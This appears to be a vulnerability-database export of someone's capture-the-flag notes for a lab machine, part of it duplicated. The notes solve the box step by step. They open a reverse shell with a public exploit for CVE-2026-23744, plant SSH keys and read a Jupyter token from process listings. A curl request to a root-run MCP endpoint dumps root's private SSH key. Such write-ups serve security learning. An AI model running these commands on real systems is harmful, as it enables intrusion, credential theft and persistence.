processes ran as root\n\n```\nroot 1082 0.0 0.7 37376 28788 ? Ss 09:53 0:02 /home/analyst/jupyter-env/bin/python3 /opt/opsmcp/server.py\n```\n\n- env: nothing.\n\n## Track 5: /opt/opsmcp/server.py runs as root\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nOPSMCP - Operations MCP Server\nInternal tool for system operations management\n\"\"\"\n\nfrom flask import Flask, jsonify, request\nimport os\n\napp = Flask(__name__)\n\n# API Key for authentication\nVALID_API_KEY = \"opsmcp_secret_key_4f5a6b7c8d9e0f1a\"\n\n...\n\ndef check_auth():\n \"\"\"Check API key authentication\"\"\"\n api_key = request.headers.get('X-API-Key', '')\n return api_key == VALID_API_KEY\n\n...\n\n@app.route('/tools/call', methods=['POST'])\ndef call_tool():\n if not check_auth():\n return jsonify({\"error\": \"Unauthorized\", \"message\": \"Valid X-API-Key header required\"}), 401\n\n data = request.get_json() or {}\n tool_name = data.get('name', '')\n args = data.get('arguments', {})\n\n if not tool_name:\n return jsonify({\"error\": \"Tool name required\"}), 400\n\n if tool_name not in ALL_TOOLS:\n return jsonify({\"error\": f\"Unknown tool: {tool_name}\"}), 404\n\n # Execute tool\n if tool_name == \"ops.system_status\":\n ...\n\n\n elif tool_name == \"ops._admin_dump\":\n target = args.get('target', '')\n confirm = args.get('confirm', False)\n\n if not confirm:\n return jsonify({\n \"error\": \"Confirmation required\",\n \"usage\": \"Set confirm=true to proceed\",\n \"warning\": \"This dumps sensitive credentials\"\n })\n\n if target == \"ssh_keys\":\n try:\n with open('/root/.ssh/id_rsa', 'r') as f:\n key_data = f.read()\n return jsonify({\n \"target\": \"ssh_keys\",\n \"root_private_key\": key_data,\n \"note\": \"Emergency recovery key dump\"\n })\n except Exception as e:\n return jsonify({\n \"target\": \"ssh_keys\",\n \"error\": f\"Could not read key: {str(e)}\"\n })\n\n ...\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', port=5000, debug=False)\n```\n\n\n1. There are tokens in cleartext\n2. In track 6 we have already seen that flask is owned by root: connection to this finding?\n3. Script analysis\n\t1. we probably have the passwords of analyst but not needed anymore\n\t2. This can leak /root/.ssh/id_rsa !\n4. we want to expose this, call with `tool_name=ops._admin_dump` and `target == \"ssh_keys\":`\n\t1. expose `ssh -i ~/.ssh/htb analyst@devhub.htb -L 5000:localhost:5000`\n\t2. try\n\t\n```\n\tcurl localhost:5000\n{\"auth\":\"Required - X-API-Key header\",\"endpoints\":[\"/tools/list\",\"/tools/call\",\"/health\"],\"server\":\"OPSMCP\",\"status\":\"operational\",\"version\":\"2.1.0\"}\n```\n\n```\n curl -s -X POST \\\n 'http://localhost:5000/tools/call' \\\n -H 'X-API-Key: opsmcp_secret_key_4f5a6b7c8d9e0f1a' \\\n -H \"Content-Type: application/json\" -d '{\"name\": \"ops._admin_dump\", \"arguments\": {\"confirm\": true, \"target\": \"ssh_keys\"}}'\n```\n\nreturns the root ssh key.\n\n1. vim ~/.ssh/htb2\n2. chmod 600 ~/.ssh/htb2\n3. ssh -i ~/.ssh/htb2 root@devhub.htb\n4. cat root.txt\n\nSolved\n\n## Track 6 : writable /home/analyst/jupyter-env/bin found by linpeas\n\n1. \n\n```\n analyst@devhub:~$ ls -Rl /home/analyst/jupyter-env/bin\n/home/analyst/jupyter-env/bin:\n-rw-r--r-- 1 analyst analyst 2008 Jan 22 15:03 activate\n-rw-r--r-- 1 analyst analyst 934 Jan 22 15:03 activate.csh\n-rw-r--r-- 1 analyst analyst 2210 Jan 22 15:03 activate.fish\n-rw-r--r-- 1 analyst analyst 9033 Jan 22 15:03 Activate.ps1\n-rwxr-xr-x 1 analyst analyst 211 Jan 22 15:06 debugpy\n-rwxr-xr-x 1 analyst analyst 217 Jan 22 15:06 debugpy-adapter\n-rwxr-xr-x 1 analyst analyst 210 Jan 22 15:06 f2py\n-rwxr-xr-x 1 root root 202 Mar 16 21:28 flask\n-rwxr-xr-x 1 analyst analyst 211 Jan 22 15:06 fonttools\n```\n\nflask is owned by root\n\nTrack abandoned\n\n", "creation_timestamp": "2026-06-18T12:30:28.000000Z"} {"uuid": "c7da0f33-d719-4341-b950-79389d22c220", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://gist.github.com/Yann-P/597c2a31f6485fd849eb896411334a3f", "content": "\n1. nmap\n2. find port 80\n3. http page mentions mcp port 6274\n4. try access port 6274 in http\n5. shows mcpjam landing page\n6. find CVE and exploit https://raw.githubusercontent.com/alisster00/CVE-2026-23744-RCE/refs/heads/main/script.py\n7. reverse shell, `nc -l 10.10.15.61 4444`, `python mcpexploit.py --lport 4444 --lhost 10.10.15.61 -p 6274 devhub.htb`\n8. put autorized key, `echo 'ssh-ed25519 AAAAC3NzaC1l... htb' > ~/.ssh/authorized_keys`\n\n### Track 1: linpeas\n\n1. on host, `curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh`\n2. on host, `scp -i ~/.ssh/htb ./linpeas.sh mcp-dev@devhub.htb:~/`\n3. on target, run linpeas\n\nFindings\n\n```\nhttps://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html\nPackageKit version detected: 1.2.5\nVulnerable to CVE-2026-41651 (Pack2TheRoot) - PackageKit 1.2.5 is in the vulnerable range >=1.0.2 <=1.3.4\n```\n\nNot exploited for now.\n\n### Track 2: lateral movement to analyst\n\n10. ls /home, shows user \"analyst\"\n11. `ps aux | grep analyst`\n\n```\nanalyst 1077 0.0 2.4 182524 96256 ? Ss 09:53 0:06 /home/analyst/jupyter-env/bin/python3 /home/analyst/jupyter-env/bin/jupyter-lab --ip=127.0.0.1 --port=8888 --no-browser --notebook-dir=/home/analyst/notebooks --ServerApp.token=a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7 --ServerApp.password= --ServerApp.allow_origin= --ServerApp.disable_check_xsrf=False\nroot 1082 0.0 0.7 37376 28788 ? Ss 09:53 0:01 /home/analyst/jupyter-env/bin/python3 /opt/opsmcp/server.py\n```\n\n### Track 3: Jupyter\n\n1. Expose port 8888\n2. `ssh -i ~/.ssh/htb mcp-dev@devhub.htb -L 8888:localhost:8888 `\n3. token is leaked by ps aux above, set up new password \"yolo\" on localhost:8888 web ui.\n4. new terminal on jupyterlab (shell as analyst) -> `cat user.txt` -> `e73a08ded246c24...`\n\nLateral to analyst succeeded. User flag solved.\n\nAdditional: \n1. `mkdir ~/.ssh && echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NT.... htb' > ~/.ssh/authorized_keys`\n\n### Track 4: linpeas again\n\n1. `scp -i ~/.ssh/htb ./linpeas.sh analyst@devhub.htb:~/`\n\nFindings\n\n```\n\u2550\u2563 Services with writable paths? . jupyter.service: Writable service PATH entry '/home/analyst/jupyter-env/bin'\njupyter.service: /home/analyst/jupyter-env/bin/jupyter (from ExecStart=/home/analyst/jupyter-env/bin/jupyter lab --ip=127.0.0.1 --port=8888 --no-browser --notebook-dir=/home/analyst/notebooks --ServerApp.token='a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7' --ServerApp.password='' --ServerApp.allow_origin='' --ServerApp.disable_check_xsrf=False)\nopsmcp.service: Writable service PATH entry '/home/analyst/jupyter-env/bin'\n```\n\n\n### Exploration\n- processes ran as root\n\n```\nroot 1082 0.0 0.7 37376 28788 ? Ss 09:53 0:02 /home/analyst/jupyter-env/bin/python3 /opt/opsmcp/server.py\n```\n\n- env: nothing.\n\n## Track 5: /opt/opsmcp/server.py runs as root\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nOPSMCP - Operations MCP Server\nInternal tool for system operations management\n\"\"\"\n\nfrom flask import Flask, jsonify, request\nimport os\n\napp = Flask(__name__)\n\n# API Key for authentication\nVALID_API_KEY = \"opsmcp_secret_key_4f5a6b7c8d9e0f1a\"\n\n...\n\ndef check_auth():\n \"\"\"Check API key authentication\"\"\"\n api_key = request.headers.get('X-API-Key', '')\n return api_key == VALID_API_KEY\n\n...\n\n@app.route('/tools/call', methods=['POST'])\ndef call_tool():\n if not check_auth():\n return jsonify({\"error\": \"Unauthorized\", \"message\": \"Valid X-API-Key header required\"}), 401\n\n data = request.get_json() or {}\n tool_name = data.get('name', '')\n args = data.get('arguments', {})\n\n if not tool_name:\n return jsonify({\"error\": \"Tool name required\"}), 400\n\n if tool_name not in ALL_TOOLS:\n return jsonify({\"error\": f\"Unknown tool: {tool_name}\"}), 404\n\n # Execute tool\n if tool_name == \"ops.system_status\":\n ...\n\n\n elif tool_name == \"ops._admin_dump\":\n target = args.get('target', '')\n confirm = args.get('confirm', False)\n\n if not confirm:\n return jsonify({\n \"error\": \"Confirmation required\",\n \"usage\": \"Set confirm=true to proceed\",\n \"warning\": \"This dumps sensitive credentials\"\n })\n\n if target == \"ssh_keys\":\n try:\n with open('/root/.ssh/id_rsa', 'r') as f:\n key_data = f.read()\n return jsonify({\n \"target\": \"ssh_keys\",\n \"root_private_key\": key_data,\n \"note\": \"Emergency recovery key dump\"\n })\n except Exception as e:\n return jsonify({\n \"target\": \"ssh_keys\",\n \"error\": f\"Could not read key: {str(e)}\"\n })\n\n ...\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', port=5000, debug=False)\n```\n\n\n1. There are tokens in cleartext\n2. In track 6 we have already seen that flask is owned by root: connection to this finding?\n3. Script analysis\n\t1. we probably have the passwords of analyst but not needed anymore\n\t2. This can leak /root/.ssh/id_rsa !\n4. we want to expose this, call with `tool_name=ops._admin_dump` and `target == \"ssh_keys\":`\n\t1. expose `ssh -i ~/.ssh/htb analyst@devhub.htb -L 5000:localhost:5000`\n\t2. try\n\t\n```\n\tcurl localhost:5000\n{\"auth\":\"Required - X-API-Key header\",\"endpoints\":[\"/tools/list\",\"/tools/call\",\"/health\"],\"server\":\"OPSMCP\",\"status\":\"operational\",\"version\":\"2.1.0\"}\n```\n\n```\n curl -s -X POST \\\n 'http://localhost:5000/tools/call' \\\n -H 'X-API-Key: opsmcp_secret_key_4f5a6b7c8d9e0f1a' \\\n -H \"Content-Type: application/json\" -d '{\"name\": \"ops._admin_dump\", \"arguments\": {\"confirm\": true, \"target\": \"ssh_keys\"}}'\n```\n\nreturns the root ssh key.\n\n1. vim ~/.ssh/htb2\n2. chmod 600 ~/.ssh/htb2\n3. ssh -i ~/.ssh/htb2 root@devhub.htb\n4. cat root.txt\n\nSolved\n\n## Track 6 : writable /home/analyst/jupyter-env/bin found by linpeas\n\n1. \n\n```\n analyst@devhub:~$ ls -Rl /home/analyst/jupyter-env/bin\n/home/analyst/jupyter-env/bin:\n-rw-r--r-- 1 analyst analyst 2008 Jan 22 15:03 activate\n-rw-r--r-- 1 analyst analyst 934 Jan 22 15:03 activate.csh\n-rw-r--r-- 1 analyst analyst 2210 Jan 22 15:03 activate.fish\n-rw-r--r-- 1 analyst analyst 9033 Jan 22 15:03 Activate.ps1\n-rwxr-xr-x 1 analyst analyst 211 Jan 22 15:06 debugpy\n-rwxr-xr-x 1 analyst analyst 217 Jan 22 15:06 debugpy-adapter\n-rwxr-xr-x 1 analyst analyst 210 Jan 22 15:06 f2py\n-rwxr-xr-x 1 root root 202 Mar 16 21:28 flask\n-rwxr-xr-x 1 analyst analyst 211 Jan 22 15:06 fonttools\n```\n\nflask is owned by root\n\nTrack abandoned\n\n", "creation_timestamp": "2026-06-18T12:30:28.000000Z"} https://vulnerability.circl.lu/sighting/c7da0f33-d719-4341-b950-79389d22c220/export Thu, 18 Jun 2026 12:30:28 +0000